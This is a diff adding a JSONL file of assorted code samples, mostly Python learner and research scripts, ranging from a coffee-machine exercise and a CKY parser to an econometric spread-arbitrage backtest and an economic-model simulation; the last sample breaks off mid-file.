diff --git "a/2465.jsonl" "b/2465.jsonl" new file mode 100644--- /dev/null +++ "b/2465.jsonl" @@ -0,0 +1,622 @@ +{"seq_id":"295800550","text":"print(\"Welcome to Gabriel's Function Calculator\")\n\nnum1 = int(raw_input(\"Give me a number please: \"))\nnum2 = int(raw_input(\"Give me another number please: \"))\n\ndef myAddFunction(add1, add2):\n sum = add1 + add2\n return sum\n\nprint(\"Here is the sum: \" + str(myAddFunction(num1, num2)))\n\n\n\ndef mySubtractFunction(sub1, sub2):\n dif = sub1 - sub2\n return dif\n\nprint(\"Here is the difference: \" + str(mySubtractFunction(num1, num2)))\n\n\n\ndef myMultFunction(mult1, mult2):\n product = mult1 * mult2\n return product\n\nprint(\"Here is the product: \" + str(myMultFunction(num1, num2)))\n","sub_path":"python/labs/functions-cardio/functionsCalculator.py","file_name":"functionsCalculator.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"290016478","text":"# %load q04_ridge/build.py\n# Default imports\nfrom sklearn.linear_model import Ridge\nimport pandas as pd\nimport numpy as np\nfrom sklearn.metrics import mean_squared_error\nfrom greyatomlib.advanced_linear_regression.q01_load_data.build import load_data\n\n# We have already loaded the data for you\ndata_set, X_train, X_test, y_train, y_test = load_data('data/house_prices_multivariate.csv')\n\nnp.random.seed(9)\n\n\n# Write your solution here\ndef ridge(alpha=0.01):\n model = Ridge(alpha,normalize=True,random_state=9)\n model.fit(X_train,y_train)\n y_pred_train = model.predict(X_train)\n y_pred_test = model.predict(X_test)\n \n mse_train=mean_squared_error(y_pred_train,y_train)\n mse_test=mean_squared_error(y_pred_test,y_test)\n \n rmse_train = mse_train**(0.5)\n rmse_test = mse_test**(0.5)\n \n var=(rmse_train,rmse_test,model)\n return var\n\n\n","sub_path":"q04_ridge/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"521835057","text":"import csv\n\nfrom pyash import Move\n\nmapping = {\n 'n°_de_transaction': 'id_transaction',\n}\n\n\ndef clean(v):\n v = v.lower().strip()\n for s, d in ((\"'\", ''), (' ', '_')):\n v = v.replace(s, d)\n return mapping.get(v, v)\n\n\ndef import_csv(filename):\n lines = []\n headers = []\n with open(filename, 'r') as fd:\n for line in csv.reader(fd):\n if not headers:\n headers = [clean(s) for s in line[:]]\n continue\n line = [l.decode('latin1') for l in line]\n line = dict(zip(headers, line))\n d = line['date'].split('/')\n line['date'] = '/'.join(reversed(d))\n line['amount'] = line['net']\n line['kind'] = 'Transfer'\n if line['avant_commission'] == '20,00':\n line['category'] = 'Cotisation'\n line['status'] = 'X'\n else:\n line['category'] = 'Other'\n line['status'] = 'P'\n line['description'] = line['nom']\n line['commission'] = line['commission'].strip('-')\n comment = (u'%(titre_de_lobjet)s\\n'\n u' Commission: %(avant_commission)s-%(commission)s\\n'\n u' Transaction Paypal: %(id_transaction)s\\n'\n ) % line\n line['comment'] = comment.strip()\n lines.append(((int(d) for i in d), line))\n for d, line in reversed(lines):\n print(Move.template.render(m=line).encode('utf8'))\n","sub_path":"pyash/paypal.py","file_name":"paypal.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"614803416","text":"import json\nimport os\nimport 
time\nfrom datetime import datetime\nfrom pathlib import Path\nfrom typing import List\n\nimport fdb\n\nfrom data_types import CdsRouteBus, CdsBaseDataProvider\n\ntry:\n import settings\n\n CDS_HOST = settings.CDS_HOST\n CDS_DB_PATH = settings.CDS_DB_PATH\n CDS_USER = settings.CDS_USER\n CDS_PASS = settings.CDS_PASS\n LOAD_TEST_DATA = settings.LOAD_TEST_DATA\nexcept ImportError:\n settings = None\n env = os.environ\n CDS_HOST = env['CDS_HOST']\n CDS_DB_PATH = env['CDS_DB_PATH']\n CDS_USER = env['CDS_USER']\n CDS_PASS = env['CDS_PASS']\n\n\nclass CdsDBDataProvider(CdsBaseDataProvider):\n CACHE_TIMEOUT = 30\n def __init__(self, logger):\n self.logger = logger\n self.cds_db = fdb.connect(host=CDS_HOST, database=CDS_DB_PATH, user=CDS_USER,\n password=CDS_PASS, charset='WIN1251')\n self.cds_db.default_tpb = fdb.ISOLATION_LEVEL_READ_COMMITED_RO\n\n def now(self) -> datetime:\n return datetime.now()\n\n def load_all_cds_buses(self) -> List[CdsRouteBus]:\n def make_names_lower(x):\n return {k.lower(): v for (k, v) in x.iteritems()}\n\n self.logger.debug('Execute fetch all from DB')\n start = time.time()\n try:\n with fdb.TransactionContext(self.cds_db.trans(fdb.ISOLATION_LEVEL_READ_COMMITED_RO)) as tr:\n cur = tr.cursor()\n cur.execute('''SELECT bs.NAME_ AS BUS_STATION_, rt.NAME_ AS ROUTE_NAME_, o.NAME_, o.OBJ_ID_, o.LAST_TIME_,\n o.LAST_LON_, o.LAST_LAT_, o.LAST_SPEED_, o.LAST_STATION_TIME_, o.PROJ_ID_\n FROM OBJECTS O JOIN BUS_STATIONS bs\n ON o.LAST_ROUT_ = bs.ROUT_ AND o.LAST_STATION_ = bs.NUMBER_\n JOIN ROUTS rt ON o.LAST_ROUT_ = rt.ID_\n WHERE obj_output_=0''')\n self.logger.debug('Finish execution')\n result = cur.fetchallmap()\n tr.commit()\n cur.close()\n end = time.time()\n self.logger.info(f\"Finish fetch data. Elapsed: {end - start:.2f}\")\n except fdb.fbcore.DatabaseError as db_error:\n self.logger.error(db_error)\n try:\n self.cds_db = fdb.connect(host=CDS_HOST, database=CDS_DB_PATH, user=CDS_USER,\n password=CDS_PASS, charset='WIN1251')\n self.cds_db.default_tpb = fdb.ISOLATION_LEVEL_READ_COMMITED_RO\n except Exception as general_error:\n self.logger.error(general_error)\n return []\n\n result = [CdsRouteBus(**make_names_lower(x)) for x in result]\n result.sort(key=lambda s: s.last_time_, reverse=True)\n end = time.time()\n self.logger.info(f\"Finish proccess. 
Elapsed: {end - start:.2f}\")\n return result\n\n\nclass CdsTestDataProvider(CdsBaseDataProvider):\n CACHE_TIMEOUT = 0.0001\n def __init__(self, logger):\n self.logger = logger\n self.test_data_files = []\n self.test_data_index = 0\n self.mocked_now = datetime.now()\n self.load_test_data()\n\n def load_test_data(self):\n self.test_data_files = sorted(Path('./test_data/').glob('codd_data_db*.json'))\n self.test_data_index = 0\n if self.test_data_files:\n path = self.test_data_files[0]\n self.mocked_now = datetime.strptime(path.name, \"codd_data_db%y_%m_%d_%H_%M_%S.json\")\n else:\n raise Exception(\"Cannot load test data from ./test_data/\")\n\n def now(self):\n if self.test_data_files and self.test_data_index >= len(self.test_data_files):\n self.test_data_index = 0\n path = self.test_data_files[self.test_data_index]\n self.mocked_now = datetime.strptime(path.name, \"codd_data_db%y_%m_%d_%H_%M_%S.json\")\n return self.mocked_now\n\n def next_test_data(self):\n if self.test_data_files and self.test_data_index >= len(self.test_data_files):\n self.test_data_index = 0\n path = self.test_data_files[self.test_data_index]\n self.mocked_now = datetime.strptime(path.name, \"codd_data_db%y_%m_%d_%H_%M_%S.json\")\n with open(path, 'rb') as f:\n long_bus_stops = [CdsRouteBus.make(*i) for i in json.load(f)]\n self.test_data_index += 1\n self.logger.info(f'Loaded {path.name}; {self.mocked_now:%H:%M:%S}')\n return long_bus_stops\n\n def load_all_cds_buses(self) -> List[CdsRouteBus]:\n return self.next_test_data()","sub_path":"data_providers.py","file_name":"data_providers.py","file_ext":"py","file_size_in_byte":4513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"67582433","text":"import numpy as np\r\nimport statsmodels.api as sm\r\nfrom statsmodels.tsa.stattools import adfuller\r\nimport pandas as pd\r\nfrom scipy import stats\r\nfrom numpy import concatenate\r\nfrom pandas import DataFrame\r\nfrom qpython import qconnection\r\nconn = qconnection.QConnection('localhost')\r\nconn.open()\r\nday1=conn(r'''\r\nstring date where date>2018.05.31\r\n''',pandas=True)\r\nnumber=conn(r'''\r\ncount date where date>2018.05.31\r\n''',pandas=True)\r\nprint(day1[18].decode('utf-8'))\r\nprint(number)\r\ndf=DataFrame(np.ones((1,4),float,1),columns=['up','mean','down','res'])\r\ndef sca(day,sym1,sym2):\r\n conn(r'''\r\n getData: {[day;sym1;sym2]\r\n data1:select date,time:?[time>17:00;time-24:00;time],price1:price from futtick where date=day, symbol=sym1;\r\n data2:select date,time:?[time>17:00;time-24:00;time],price2:price from futtick where date=day, symbol=sym2;\r\n aj[`time;data2;data1]\r\n };\r\n ''')\r\n data=conn('getData[%s;%s;%s]'%(day,sym1,sym2),pandas=True)\r\n return data\r\n\r\nfor i in range(1,number,1):\r\n data1=sca(day1[i-1].decode('utf-8'),'`AP810','`AP812')\r\n datanext=sca(day1[i].decode('utf-8'),'`AP810','`AP812')\r\n data1=data1.values\r\n price1=data1[:,3]\r\n price2=data1[:,2]\r\n price1=np.array(price1,dtype='float')\r\n price2=np.array(price2,dtype='float')\r\n #线性回归增加常数项 y=kx+b\r\n price11=sm.add_constant(price1)\r\n # 进行最小二乘回归\r\n result = (sm.OLS(price2,price11)).fit()\r\n # 回归函数的常数项\r\n a=result.params[0]\r\n # 取得回归函数的参数项\r\n b=result.params[1]\r\n one=np.ones(((len(price1)),1),float)\r\n # 检验在时间窗口的长度下合约序列是否为协整\r\n result1 = sm.tsa.stattools.coint(price2, price1)\r\n # 取出并记录p值\r\n pvalue = result1[1]\r\n up=np.zeros(((len(price1)),1),float)\r\n down=np.zeros(((len(price1)),1),float)\r\n mean=np.zeros(((len(price1)),1),float)\r\n 
res1=np.zeros(((len(price1)),1),float)\r\n res0=price2 - b*price1 - a*one\r\n #res0=np.array(res0)\r\n if pvalue<0.05:\r\n backtest=True\r\n datanext=datanext.values\r\n price11=datanext[:,3]\r\n price22=datanext[:,2]\r\n price=np.ones((len(price11)),float,1)\r\n res1 = price22 - b*price11-a*price\r\n std = np.std(res0)\r\n mean = np.mean(res0)\r\n interval=stats.t.interval(0.95,len(res1)-1,mean,std)\r\n up_limit = interval[1]\r\n down_limit=interval[0]\r\n up=(price*up_limit).reshape(len(price),1)\r\n down=(price*down_limit).reshape(len(price),1)\r\n print(backtest)\r\n#以下为手动设置上下限以及止损线\r\n#up_limit=mean + entry * std\r\n#down_limit = mean - entry *std\r\n#up_out_limt=mean+out*std\r\n#down_out_limt=mean-out*std\r\n mean=(price*mean).reshape(len(price),1)\r\n res1=res1.reshape(len(price),1)\r\n data1=concatenate((up,mean),axis=1)\r\n data2= concatenate((data1,down),axis=1)\r\n data3= concatenate((data2,res1),axis=1)\r\n data3=DataFrame(data3,columns=['up','mean','down','res'])\r\n df=pd.concat([df,data3],axis=0)\r\nconn('{`data_m set x}', df)\r\nconn(r'''\r\ndata1:select datetime:date+time,date,time,price1:price,buy1,sell1 from futtick where date>2018.06.01,symbol=`AP810;\r\ndata2:select datetime:date+time,date,time,price2:price,bid1:buy1,ask1:sell1 from futtick where date>2018.06.01,symbol=`AP812;\r\ndata22:aj[`datetime;data2;data1];\r\ndata_m:1_data_m;\r\ndata_m1:data22 ^ data_m;\r\ndata_ming:update sig:-1 from data_m1 where res>up;\r\ndata_ming:update sig:1 from data_ming where res=res*prev res;\r\ndata_ming:update 0^fills sig from data_ming;\r\ndata_ming:update dif:price2-price1 from data_ming;\r\ndata_ming:update Ret:(prev sig)*(dif-(prev dif)) from data_ming; \r\ndata_ming:update k:1 from data_ming;\r\ndata_ming:update turnover:abs deltas sig from data_ming;\r\ndata_ming:update cost:((ask1-price2)+(price1-buy1)) from data_ming where (((prev sig)=0) and (sig=1));\r\ndata_ming:update cost:((price2-bid1)+(sell1-price1)) from data_ming where (((prev sig)=0) and (sig=-1));\r\ndata_ming:update cost:((price2-bid1)+(sell1-price1)) from data_ming where (((prev sig)=1) and (sig=0));\r\ndata_ming:update cost:((ask1-price2)+(price1-buy1)) from data_ming where (((prev sig)=-1) and (sig=0));\r\ndata_ming:update cost:0^cost from data_ming;\r\n''',pandas=True)\r\nconn(r'''\r\nfunct:{[begdate;enddate]\r\ntrade_indicator:select date,time,price1,price2,sig,dif,k,Ret,cost,turnover from data_ming where date within(begdate,enddate);\r\nhdq_CmRet1::select \r\n DailyRet:sum minRet , \r\n cm_ret:last cm_ret, \r\n number:sum k,\r\n turnover:sum turnover\r\nby date\r\nfrom (\r\n update cm_ret:sums minRet \r\n from (min_ret:select date,time,sig,turnover,k,\r\n minRet:0^log(1+((Ret-cost)%(price1+price2))) \r\n from (select date,time,sig,price1,price2,Ret,cost,k,turnover from trade_indicator)));\r\nhdq_test_result:select \r\n sharpe:(250*(avg DailyRet)) % ((sqrt 250)*(dev DailyRet)),\r\n annual_ret:250*(avg DailyRet), \r\n annual_vol :(sqrt 250)*(dev DailyRet),\r\n cum_ret: last cm_ret, \r\n maxdd: 1-exp neg max (maxs sums DailyRet)-(sums DailyRet), \r\n win_pro: (sum DailyRet>0) % ((sum DailyRet>0)+(sum DailyRet <0)),\r\n turnover_rate:(sum turnover)% (sum number)\r\n from hdq_CmRet1\r\n};\r\n''', pandas=True)\r\nresult=conn(r'''\r\nfunct[2018.06.01;2018.06.29]\r\n''',pandas=True)\r\nprint(result)","sub_path":"Calendar Spread Arbitrage.py","file_name":"Calendar Spread Arbitrage.py","file_ext":"py","file_size_in_byte":5440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} 
+{"seq_id":"562557611","text":"water = 400\nmilk = 540\nbeans = 120\ncups = 9\nmoney = 550\nmachine_phrase = \"The coffee machine has:\"\n\ndef display_machine():\n print(f\"{machine_phrase}\\n{water} of water\\n{milk} of milk\\n{beans} of beans\\n{cups} of cups\\n{money} of money\\n\\n\")\n\ndef select_action() -> str:\n return input('Write action (buy, fill, take, remaining, exit): ')\n \ndef pick_drink() -> int:\n print()\n response = input('What do you want to buy?'\n ' 1 - espresso,'\n ' 2 - latte,'\n ' 3 - cappuccino,'\n ' back - to main menu: ')\n if response == 'back':\n return 0\n return int(response)\n \ndef can_make(need_water=0, need_milk=0, need_beans=0):\n if water < need_water:\n print('Sorry, not enough water!\\n')\n return False\n if milk < need_milk:\n print('Sorry, not enough milk!\\n')\n return False\n if beans < need_beans:\n print('Sorry, not enough beans!\\n')\n return False\n if cups < 1:\n print('Sorry, not enough cups\\n')\n return False\n print('I have enough resources, making you a coffee!\\n')\n return True\n \ndef buy():\n global water, milk, beans, cups, money\n drink = pick_drink()\n if drink == 1: # espresso\n if can_make(need_water=250, need_beans=16):\n money += 4\n water -= 250\n beans -= 16\n cups -= 1\n elif drink == 2: # latte\n if can_make(need_water=350, need_milk=75, need_beans=20):\n money += 7\n water -= 350\n milk -= 75\n beans -= 20\n cups -= 1\n elif drink == 3: # cappuccino\n if can_make(need_water=200, need_milk=100, need_beans=12):\n money += 6\n water -= 200\n milk -= 100\n beans -= 12\n cups -= 1\n else:\n print(\"Invalid choice\")\n pass\n \ndef fill():\n global water, milk, beans, cups\n water += int(input('\\nWrite how many ml of water do you want to add:\\n'))\n milk += int(input('Write how many ml of milk do you want to add:\\n'))\n beans += int(input('Write how many grams of coffee beans do you want to add:\\n'))\n cups += int(input('Write how many disposable cups of coffee do you want to add:\\n'))\n print()\n\ndef take():\n global money\n print(f'\\nI gave you ${money}\\n')\n money = 0\n\ndef main():\n while True:\n action = select_action()\n\n if action == 'buy':\n buy()\n elif action == 'fill':\n fill()\n elif action == 'take':\n take()\n elif action == 'exit':\n break\n elif action == 'remaining':\n display_machine()\n else:\n print(\"Invalid option\")\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Python/CoffeeMachine/Stage6.py","file_name":"Stage6.py","file_ext":"py","file_size_in_byte":2789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"16900170","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\r\nimport numpy as np\r\nimport pickle as pkl\r\nfrom scipy.stats import norm\r\n\r\nfrom BMfuncs import Modeldefs, Modeldyn\r\n\r\n# define a function that runs simulation with shift in tax rates\r\n# -----------------------------------------------------------------------------\r\ndef polsim(simargs):\r\n \r\n # unpack\r\n (initial, nobs, ts, funcname, args1, args2, params1, params2) = simargs\r\n '''\r\n Generates a history of k & ell with a switch in regime in period ts\r\n \r\n This function reads values from the following pkl files:\r\n ILAfindss.pkl - steady state values and parameters\r\n \r\n Inputs\r\n ----------- \r\n initial: list of values for k & z (k0, z0) in the first period.\r\n nobs: number of periods to simulate.\r\n ts: period in which the shift occurs.\r\n args1: is a list of arguments needed by the solution method in baseline.\r\n For 
example, with linearization these are:\r\n coeffs1: list of (PP, QQ, UU, RR, SS, VV) under the baseline regime.\r\n XYbar1: numpy array of X & Y SS values under the baseline regime.\r\n args2: is a list of arguments needed by the solution method after change \r\n params1: list of parameters under the baseline regime.\r\n params2: list of parameters under the new regime.\r\n \r\n Returns\r\n --------\r\n For the following variables x in (k, z, Y, w, r, T, c, i, u):\r\n xhist: history of simultated values\r\n xfhist: history of one-period-ahed forecasts\r\n MsqEerr: root mean squared Euler errors\r\n '''\r\n \r\n \r\n # -------------------------------------------------------------------------\r\n # READ IN VALUES FROM STEADY STATE CALCULATIONS\r\n \r\n # load steady state values and parameters\r\n infile = open('BMfindss.pkl', 'rb')\r\n (bar1, bar2, temp1, temp2, LINparams) = pkl.load(infile)\r\n infile.close()\r\n \r\n # unpack\r\n [kbar1, Ybar1, wbar1, rbar1, Tbar1, cbar1, ibar1, ubar1] = bar1\r\n [kbar2, Ybar2, wbar2, rbar2, Tbar2, cbar2, ibar2, ubar2] = bar2\r\n [alpha, beta, tau, rho_z, sigma_z] = params1\r\n (zbar, Zbar, NN, nx, ny, nz, logX, Sylv) = LINparams\r\n \r\n # set parameter values for calculating Euler errors\r\n npts = 10 # number of point for rectangular quadrature\r\n # generate discret support for epsilon to be used in Euler error\r\n # Eps are the central values\r\n # Phi are the associated probabilities\r\n Eps = np.zeros(npts);\r\n Cum = np.linspace(0.0, 1.0, num=npts+1)+.5/npts\r\n Cum = Cum[0:npts]\r\n Phi = np.ones(npts)/npts\r\n Eps = norm.ppf(Cum)\r\n\r\n \r\n # preallocate histories\r\n khist = np.zeros(nobs+1)\r\n zhist = np.zeros(nobs)\r\n Yhist = np.zeros(nobs)\r\n whist = np.zeros(nobs)\r\n rhist = np.zeros(nobs)\r\n Thist = np.zeros(nobs)\r\n chist = np.zeros(nobs)\r\n ihist = np.zeros(nobs)\r\n uhist = np.zeros(nobs)\r\n RMsqEerrhist = np.zeros((nobs, nx+ny))\r\n \r\n # preallocate forecast histories\r\n kfhist = np.zeros(nobs+2)\r\n zfhist = np.zeros(nobs+1)\r\n Yfhist = np.zeros(nobs+1)\r\n wfhist = np.zeros(nobs+1)\r\n rfhist = np.zeros(nobs+1)\r\n Tfhist = np.zeros(nobs+1)\r\n cfhist = np.zeros(nobs+1)\r\n ifhist = np.zeros(nobs+1)\r\n ufhist = np.zeros(nobs+1)\r\n \r\n # upack simulation parameters\r\n rho_z = params1[3] \r\n sigma_z = params1[4]\r\n \r\n # set starting values\r\n (khist[0], zhist[0]) = initial\r\n \r\n # generate history of random shocks\r\n for t in range(1, nobs):\r\n zhist[t] = rho_z*zhist[t-1] + sigma_z*np.random.normal(0., 1.)\r\n \r\n # generate histories for k and ell for the first ts-1 periods\r\n for t in range(0, ts-1):\r\n khist[t+1] = funcname(khist[t], zhist[t], args1)\r\n Yhist[t], whist[t], rhist[t], Thist[t], chist[t], ihist[t], \\\r\n uhist[t] = Modeldefs(khist[t+1], khist[t], zhist[t], \\\r\n params1)\r\n \r\n # get 1-period ahead forecasts\r\n if t < ts-2: # use baseline model for predictions\r\n zfhist[t+1] = rho_z*zhist[t]\r\n kfhist[t+2] = funcname(khist[t+1], zfhist[t+1], \\\r\n args1)\r\n Yfhist[t+1], wfhist[t+1], rfhist[t+1], Tfhist[t+1], cfhist[t+1], \\\r\n ifhist[t], ufhist[t] = Modeldefs(kfhist[t+2], khist[t+1], \\\r\n zfhist[t+1], params1)\r\n \r\n # begin loop over possible values of shock next period for Euler errors\r\n MsqEerr = np.zeros(nx + ny)\r\n for i in range(0, npts):\r\n # find value of next period z\r\n zp = rho_z*zhist[t] + sigma_z*Eps[i]\r\n # find the value of k in two periods\r\n kpp = funcname(khist[t+1], zp, args1)\r\n # find the Euler errors\r\n invec = (kpp, khist[t+1], khist[t], zp, 
zhist[t])\r\n Eerr = Phi[i]*Modeldyn(invec, params1)\r\n MsqEerr = 1/(1+i) * Eerr**2 + i/(1+i) * MsqEerr\r\n RMsqEerrhist[t,:] = MsqEerr**.5\r\n\r\n else: # use change model for predictions\r\n zfhist[t+1] = rho_z*zhist[t]\r\n kfhist[t+2] = funcname(khist[t+1], zfhist[t+1], \\\r\n args2)\r\n Yfhist[t+1], wfhist[t+1], rfhist[t+1], Tfhist[t+1], cfhist[t+1], \\\r\n ifhist[t], ufhist[t] = Modeldefs(kfhist[t+2], khist[t+1], \\\r\n zfhist[t+1], params2)\r\n \r\n # begin loop over possible values of shock next period for Euler errors\r\n MsqEerr = np.zeros(nx + ny)\r\n for i in range(0, npts):\r\n # find value of next period z\r\n zp = rho_z*zhist[t] + sigma_z*Eps[i]\r\n # find the value of k in two periods\r\n kpp = funcname(khist[t+1], zp, args1)\r\n # find the Euler errors\r\n invec = (kpp, khist[t+1], khist[t], zp, zhist[t])\r\n Eerr = Phi[i]*Modeldyn(invec, params2)\r\n MsqEerr = 1/(1+i) * Eerr**2 + i/(1+i) * MsqEerr\r\n RMsqEerrhist[t,:] = MsqEerr**.5\r\n\r\n # generate histories for k and ell for the remaning periods \r\n for t in range(ts-1, nobs):\r\n khist[t+1] = funcname(khist[t], zhist[t], args2)\r\n Yhist[t], whist[t], rhist[t], Thist[t], chist[t], ihist[t], \\\r\n uhist[t] = Modeldefs(khist[t+1], khist[t], zhist[t], \\\r\n params2)\r\n \r\n # get 1-period ahead forecasts\r\n zfhist[t+1] = rho_z*zhist[t]\r\n kfhist[t+2] = funcname(khist[t+1], zfhist[t+1], args2)\r\n Yfhist[t+1], wfhist[t+1], rfhist[t+1], Tfhist[t+1], cfhist[t+1], \\\r\n ifhist[t], ufhist[t] = Modeldefs(kfhist[t+2], khist[t+1], \\\r\n zfhist[t+1], params2)\r\n \r\n # begin loop over possible values of shock next period for Euler errors\r\n MsqEerr = np.zeros(nx + ny)\r\n for i in range(0, npts):\r\n # find value of next period z\r\n zp = rho_z*zhist[t] + sigma_z*Eps[i]\r\n # find the value of k in two periods\r\n kpp = funcname(khist[t+1], zp, args1)\r\n # find the Euler errors\r\n invec = (kpp, khist[t+1], khist[t], zp, zhist[t])\r\n Eerr = Phi[i]*Modeldyn(invec, params2)\r\n MsqEerr = 1/(1+i) * Eerr**2 + i/(1+i) * MsqEerr\r\n RMsqEerrhist[t,:] = MsqEerr**.5\r\n \r\n \r\n return khist, zhist, Yhist, whist, rhist, Thist, chist, ihist, \\\r\n uhist, kfhist, zfhist, Yfhist, wfhist, rfhist, Tfhist, \\\r\n cfhist, ifhist, ufhist, RMsqEerrhist","sub_path":"BrockMirman/BMpolsim.py","file_name":"BMpolsim.py","file_ext":"py","file_size_in_byte":7511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"637321022","text":"import sys\nsys.path.append('..')\nfrom utils.data import load_text\nfrom collections import defaultdict\nfrom math import log\nfrom nltk.tree import Tree\n\ndef load_grammar(fname = '../../test/08-grammar.txt'):\n terms = defaultdict(list)\n nonterms = []\n for parent, children, prob in load_text(fname, '\\t'):\n children = tuple(children.split(' '))\n entropy = -log(float(prob))\n\n # separate rule by length\n if len(children) == 1:\n terms[children[0]].append((parent, entropy))\n else:\n nonterms.append((parent, entropy) + children )\n return terms, nonterms\n\ndef unk(terms):\n # unlike n_gram model calculate prob by counting\n # unk probability is given by the grammar\n # whose entropy cannot be smoothed by interpolating\n unk_entropy = defaultdict(list)\n sum_entropy = 0\n for child, possible_parents in terms.items():\n for parent, entropy in possible_parents:\n unk_entropy[parent].append(entropy)\n sum_entropy += entropy\n\n # give unk an average entropy over all syms\n for parent, entropys in unk_entropy.items():\n # list of entropy -> entropy\n 
unk_entropy[parent] = sum(entropys) / sum_entropy\n *unk_entropy, = zip(unk_entropy.keys(), unk_entropy.values())\n\n # for unk (shared_parents, average entropy)\n terms.default_factory = (lambda: unk_entropy)\n\ndef bottom_up_ij(length):\n coverage = 1\n while coverage <= length:\n step = coverage - 1\n while step >= 0:\n # plus 1 for pythonic consistency in slicing & ranging\n yield step, coverage + 1\n step -= 1\n coverage += 1\n\ndef bottom_up(tokens, grammar):\n\n terms, nonterms = grammar\n entropy_bag = {}\n local_best_coverage = {}\n\n # terms bottom\n for i, tok in enumerate(tokens):\n # 'a' can be [noun letter 'a', det, ...]\n for child, entropy in terms[tok]:\n entropy_bag[(child, i, i + 1)] = entropy\n\n # nonterms up\n for i, j in bottom_up_ij(len(tokens)):\n for k in range(i+1, j):\n # try every grammar!\n for parent, entropy, lchild, rchild in nonterms:\n ij = (parent, i, j)\n ik = (lchild, i, k)\n kj = (rchild, k, j)\n if (ik in entropy_bag) and (kj in entropy_bag):\n ij_entropy = entropy_bag[ik] + entropy_bag[kj] + entropy\n if (ij not in entropy_bag) or (ij_entropy < entropy_bag[ij]):\n entropy_bag[ij] = ij_entropy\n local_best_coverage[ij] = (ik, kj)\n final_coverage = ij\n return local_best_coverage, final_coverage\n\ndef top_down(local_best_coverage, tokens, ij, level = 0):\n\n postag, i, _ = ij\n indent = ' ' * level\n if ij in local_best_coverage:\n # nonterms\n ik, kj = local_best_coverage[ij]\n ik_str = top_down(local_best_coverage, tokens, ik, level + 1)\n kj_str = top_down(local_best_coverage, tokens, kj, level + 1)\n return '%s%s (\\n%s \\n%s\\n%s)' % (indent, postag, ik_str, kj_str, indent)\n else:\n # terms\n return \"%s[%s '%s']\" % (indent, postag, tokens[i])\n\n\nif __name__ == '__main__':\n grammar = load_grammar('../../test/08-grammar.txt')\n for tokens in load_text('../../test/08-input.txt'):\n coverage_bag, root = bottom_up(tokens, grammar)\n s = top_down(coverage_bag, tokens, root)\n print(s)\n Tree.fromstring(s).draw()\n","sub_path":"zchen/tutorial10/10.cky.py","file_name":"10.cky.py","file_ext":"py","file_size_in_byte":3537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"608273352","text":"import json\n\nfrom tdl.util import Util\n\n\nclass Request:\n\n def __init__(self, method, params, id_):\n self.method = method\n self.params = params\n self.id = id_\n\n def get_audit_text(self):\n return 'id = {id}, req = {method}({params})'.format(\n id=self.id,\n method=self.method,\n params=', '.join(list([Util.compress_text(x) for x in self.params])))\n\n @staticmethod\n def deserialize(message_json, audit):\n try:\n decoded_message = json.loads(message_json)\n return Request(\n decoded_message['method'],\n decoded_message['params'],\n decoded_message['id'])\n except:\n audit.log_line('Invalid message format')\n raise\n","sub_path":"src/tdl/queue/abstractions/request.py","file_name":"request.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"527914069","text":"import datetime\n\nfrom aiogram import types, Bot\nfrom aiogram.types import PhotoSize\n\nfrom models import db\n\n\ndef get_full_user_name(message: types.Message) -> str:\n \"\"\"get user fullname from message\"\"\"\n if message.from_user:\n pre_fn = message.from_user.first_name\n pre_ln = message.from_user.last_name\n first_name = pre_fn if pre_fn else ' '\n last_name = pre_ln if pre_ln else ' '\n return f'{first_name} {last_name}'\n else:\n return 
''\n\n\ndef get_event(callback):\n event_id = get_id_from_data(callback.data, 1)\n event = db.get_from_db_multiple_filter(db.Event, [db.Event.id == event_id])\n if isinstance(event, db.Event):\n return event\n\n\ndef retrieve_message_unique_id(message: types.Message, bot: Bot):\n photo = message.photo[0]\n assert isinstance(photo, PhotoSize)\n # solved send photo.file_id\n photo_file_id = photo.file_id\n return photo_file_id\n\n\ndef try_get_date_from_str(from_date, date_format):\n # upper_bound date to include current day\n try:\n date_from = datetime.datetime.strptime(from_date, date_format)\n if date_from < datetime.datetime.now():\n # if start day bigger than end_date raise error\n raise ValueError()\n except ValueError as e:\n return None\n else:\n return date_from\n\n\ndef get_id_from_data(data: str, index):\n \"\"\"\n get id from data\n :param data: data from callback\n :param index: index of information\n \"\"\"\n assert ':' in data\n return data.split(':')[index]\n\n\ndef format_hast(first_chat_id, second_chat_id, event_id):\n \"\"\"generate chat_hash\"\"\"\n return f\"{first_chat_id}-{second_chat_id}-{event_id}\"\n\n\ndef check_hash_valid(chat_hash1, chat_hash2):\n \"\"\"\n check if two users in one chat\n chat hash consist 1 chat id, 2 chat id and event id\n :param chat_hash1: chat_id of first user\n :param chat_hash2: chat_id of second user\n :return:\n \"\"\"\n if chat_hash1 is None or chat_hash2 is None:\n return False\n chat11, chat12, event_id1 = chat_hash1.split('-')\n chat21, chat22, event_id2 = chat_hash2.split('-')\n\n in_chat = sorted([chat11, chat12]) == sorted([chat21, chat22]) and event_id1 == event_id2\n return in_chat\n\n","sub_path":"utils/useful_methods.py","file_name":"useful_methods.py","file_ext":"py","file_size_in_byte":2239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"377578172","text":"# Problem from UVA\n# https://onlinejudge.org/index.php?option=com_onlinejudge&Itemid=8&page=show_problem&problem=3649\n\n\nclass Triad:\n def __init__(self, source, target, weight):\n self.source = source\n self.target = target\n self.weight = weight\n\n\nparent = []\nranks = []\ndist = []\ngraph = []\n\n\ndef make_set(V):\n global parent, ranks, 